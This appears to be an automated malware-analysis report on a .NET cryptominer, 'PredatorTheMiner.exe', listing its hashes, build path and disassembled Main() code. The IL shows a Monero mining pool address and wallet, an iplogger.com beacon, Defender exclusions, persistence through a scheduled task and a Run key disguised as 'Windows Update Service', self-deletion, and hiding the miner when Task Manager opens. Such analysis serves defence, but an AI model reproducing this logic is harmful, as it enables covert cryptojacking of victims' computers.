5452f5e780a1964b7b48c04459b91c78
PE Executable | MD5: 5452f5e780a1964b7b48c04459b91c78 | Size: 1.96 MB | application/x-dosexec
Symbol Obfuscation Score
| Hash | Hash Value |
|---|---|
| MD5 | 5452f5e780a1964b7b48c04459b91c78 |
| Sha1 | cc8d20657003ccbc1a8a7ee6ca457d412e26f786 |
| Sha256 | ac9b66046e7b48690eec441a018373e654b164cdb01957f1712d39404063517f |
| Sha384 | 25ad831474965a1ba79bc2f206dde86fd8c27992c2001fe6104062957e39b98d1a9ad2c8c190f348a89229d881782654 |
| Sha512 | 2d0255ce376a019087dbe372899eb5e5e780429ddd6d0e9e7a0a9469c4823432fd30623d132e1197c3cf1bfd16dc63cc9a3a60daf2311421af806e377fb32695 |
| SSDeep | 49152:W8zt1S0tH8/SXCsHhJbv/vnvyYN1HFEHJ:Vzfp8qX/TnXHvlEp |
| TLSH | 1195237B3695C969C733A2B0A8A3E58CFEA33F1729B683171714738D55BBA00C679143 |
PeID
| Name | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | PDB Path: C:\Users\vboxuser\Desktop\Silent-Miner-XMR-Monero WIN7-WIN 10-master\Silent-Miner-XMR-Monero-master\obj\Release\PredatorTheMiner.pdb |
| Module Name | PredatorTheMiner.exe |
| Full Name | PredatorTheMiner.exe |
| EntryPoint | System.Void PredatorTheMiner.Program::Main() |
| Scope Name | PredatorTheMiner.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | PredatorTheMiner |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.8 |
| Total Strings | 83 |
| Main Method | System.Void PredatorTheMiner.Program::Main() |
| Main IL Instruction Count | 230 |
| Main IL | ldstr LocalAppData call System.String System.Environment::GetEnvironmentVariable(System.String) dup <null> ldstr \Streamm.exe call System.String System.String::Concat(System.String,System.String) stloc.0 <null> dup <null> ldstr \runtime-servece.exe call System.String System.String::Concat(System.String,System.String) stloc.1 <null> dup <null> ldstr \start_miner.vbs call System.String System.String::Concat(System.String,System.String) stloc.2 <null> ldstr \.sysconfig call System.String System.String::Concat(System.String,System.String) stloc.3 <null> ldloc.0 <null> ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> call System.Boolean PredatorTheMiner.Program::IsAlreadyInstalled(System.String,System.String,System.String,System.String) brfalse.s IL_0049: ldstr "https://iplogger.com/2j5MD5" leave IL_029C: ret ldstr https://iplogger.com/2j5MD5 call System.Boolean PredatorTheMiner.Helper::SiteConnection(System.String) pop <null> newobj System.Void System.Random::.ctor() ldc.i4.1 <null> ldc.i4 100001 callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) stloc.s V_4 ldloca.s V_4 call System.String System.Int32::ToString() stloc.s V_5 newobj System.Void System.Diagnostics.Process::.ctor() stloc.s V_6 ldloc.s V_6 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) ldloc.s V_6 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) ldloc.s V_6 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldstr --url={0} --user={1} --pass={4} --donate-level=1 --keepalive --retries=5 --max-cpu-usage={3} --cpu-priority=2 ldc.i4.5 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldstr xmr.kryptex.network:7029 stelem.ref <null> dup <null> 
ldc.i4.1 <null> ldstr 48sJ3RQVWcR4tHeemmq4cTAwYgTzGeiFWjhSfpphAtmdgDUUX7VMjLUKoWer3FjB8MXLvhocXwcbZUbrQF39gFUAHibpxEM stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr 0x3 stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr 75 stelem.ref <null> dup <null> ldc.i4.4 <null> ldloc.s V_5 stelem.ref <null> call System.String System.String::Format(System.String,System.Object[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.0 <null> ldloc.1 <null> ldloc.2 <null> call System.Void PredatorTheMiner.RunTime/DefenderExclusion::SetupAllExclusions(System.String,System.String,System.String) leave.s IL_00DE: ldloc.0 pop <null> leave.s IL_00DE: ldloc.0 ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_00F3: nop call System.String PredatorTheMiner.Program::get_StartPath() ldloc.0 <null> call System.Boolean System.String::op_Inequality(System.String,System.String) brfalse.s IL_0119: nop nop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0102: call System.String PredatorTheMiner.Program::get_StartPath() ldloc.0 <null> call System.Void System.IO.File::Delete(System.String) call System.String PredatorTheMiner.Program::get_StartPath() ldloc.0 <null> call System.Void System.IO.File::Copy(System.String,System.String) ldloc.0 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) leave.s IL_0119: nop pop <null> leave.s IL_0119: nop nop <null> ldloc.s V_6 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() callvirt System.String System.Diagnostics.ProcessStartInfo::get_Arguments() stloc.s V_7 ldstr Set WshShell = CreateObject("WScript.Shell") stloc.s V_8 ldc.i4.6 <null> newarr System.String dup <null> ldc.i4.0 <null> ldloc.s V_8 stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr WshShell.Run """ stelem.ref <null> dup <null> ldc.i4.2 <null> ldloc.1 <null> stelem.ref <null> dup 
<null> ldc.i4.3 <null> ldstr "" stelem.ref <null> dup <null> ldc.i4.4 <null> ldloc.s V_7 stelem.ref <null> dup <null> ldc.i4.5 <null> ldstr ", 0, False stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_8 ldloc.2 <null> ldloc.s V_8 call System.Void System.IO.File::WriteAllText(System.String,System.String) ldloc.2 <null> ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) leave.s IL_0176: ldc.i4.0 pop <null> leave.s IL_0176: ldc.i4.0 ldc.i4.0 <null> call System.Void PredatorTheMiner.RunTime/Defend::SetupDefend(PredatorTheMiner.RunTime/Defend/DefendOptions) ldstr Windows_launcher newobj System.Void PredatorTheMiner.Implant/ScheduleTask::.ctor(System.String) ldstr wscript.exe " ldloc.2 <null> ldstr " call System.String System.String::Concat(System.String,System.String,System.String) call System.Void PredatorTheMiner.Implant/ScheduleTask::AddTask(System.String) ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) dup <null> ldstr Windows Update Service ldstr wscript.exe " ldloc.2 <null> ldstr " call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) callvirt System.Void Microsoft.Win32.RegistryKey::Close() leave.s IL_01D0: ldloc.1 pop <null> leave.s IL_01D0: ldloc.1 ldloc.1 <null> call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_01E3: ldloc.s V_6 ldloc.1 <null> call System.Byte[] PredatorTheMiner.Properties.Resources::get_shost() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.s V_6 callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo() ldloc.1 <null> callvirt System.Void 
System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.s V_6 callvirt System.Boolean System.Diagnostics.Process::Start() pop <null> ldloc.3 <null> call System.Void PredatorTheMiner.Program::CreateInstallationMarker(System.String) call System.Void PredatorTheMiner.Program::SendTelegramNotification() call System.String PredatorTheMiner.Program::get_StartPath() ldloc.0 <null> call System.Boolean System.String::op_Inequality(System.String,System.String) brfalse.s IL_021A: call System.Void PredatorTheMiner.Helper::AuthorFee() call System.Void PredatorTheMiner.Helper::DeleteMe() leave.s IL_021A: call System.Void PredatorTheMiner.Helper::AuthorFee() pop <null> leave.s IL_021A: call System.Void PredatorTheMiner.Helper::AuthorFee() call System.Void PredatorTheMiner.Helper::AuthorFee() ldstr taskmgr call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_0283: ldloc.s V_6 ldstr Taskmgr call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_0283: ldloc.s V_6 ldstr ProcessHacker call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_0283: ldloc.s V_6 call System.Boolean System.Environment::get_HasShutdownStarted() brtrue.s IL_0283: ldloc.s V_6 ldstr ldstr Task Manager call System.IntPtr PredatorTheMiner.Program::FindWindow(System.String,System.String) ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Inequality(System.IntPtr,System.IntPtr) brtrue.s IL_0283: ldloc.s V_6 ldstr ldstr Диспетчер задач call System.IntPtr PredatorTheMiner.Program::FindWindow(System.String,System.String) ldsfld System.IntPtr System.IntPtr::Zero call System.Boolean System.IntPtr::op_Inequality(System.IntPtr,System.IntPtr) brfalse.s IL_0290: ldc.i4.s 10 ldloc.s V_6 callvirt System.Void System.Diagnostics.Process::Kill() ldc.i4.0 <null> call System.Void 
System.Environment::Exit(System.Int32) ldc.i4.s 10 call System.Void System.Threading.Thread::Sleep(System.Int32) br.s IL_021F: ldstr "taskmgr" pop <null> leave.s IL_029C: ret ret <null> |